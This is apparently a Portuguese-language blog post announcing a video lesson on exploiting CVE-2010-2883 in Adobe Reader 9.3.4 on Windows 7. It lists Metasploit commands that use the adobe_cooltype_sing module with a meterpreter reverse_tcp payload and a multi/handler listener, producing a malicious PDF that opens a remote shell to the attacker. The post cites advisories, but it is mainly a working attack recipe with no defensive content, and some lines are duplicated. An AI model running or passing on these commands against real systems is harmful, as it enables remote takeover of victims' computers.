Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P
Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler
Sobre o Vídeo:
Formato: AVI
Tamanho: 18.8 MB
Duração: 5:59 min
Musica: Carl Orff - Carmina Burana - O Fortuna
Tamanho: 18.8 MB
Duração: 5:59 min
Musica: Carl Orff - Carmina Burana - O Fortuna
Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html
0 comentários:
Postar um comentário